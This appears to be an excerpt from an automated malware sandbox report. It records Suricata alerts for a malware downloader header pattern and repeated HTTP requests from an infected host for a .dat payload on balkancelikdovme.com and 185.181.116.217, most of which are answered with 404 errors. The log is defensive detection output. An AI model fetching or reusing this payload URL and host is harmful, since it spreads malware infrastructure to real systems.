Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49936 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49831 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49866 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50054 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49799 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49881 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50050 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49856 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49978 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50056 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50045 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49931 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49818 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49814 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49900 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49825 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49809 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50059 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49841 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50019 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49862 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50057 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50068 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50069 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50063 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49987 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49996 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49846 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49905 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50039 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50060 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50064 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50002 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49921 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49888 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49894 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50014 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49952 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50072 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50055 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49948 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50066 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50071 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50065 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50070 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50025 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50067 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50033 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50027 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50053 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50073 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50058 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50074 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49942 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49973 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49967 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50008 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49990 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50051 -> 185.181.116.217:443
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:50052 -> 185.181.116.217:443
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficDNS traffic detected: DNS query: balkancelikdovme.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:28 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:30 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:32 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:34 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:36 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:38 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:40 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:42 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:44 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:46 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:48 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:49 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:52 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:53 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:55 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:57 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:24:59 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:01 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:03 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:05 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:07 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:08 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:10 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:12 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:14 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:16 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:18 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:20 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:22 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:24 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:25 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:27 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:29 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:31 GMTvary: User-Agent
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 16 Dec 2024 13:25:33 GMTvary: User-Agent
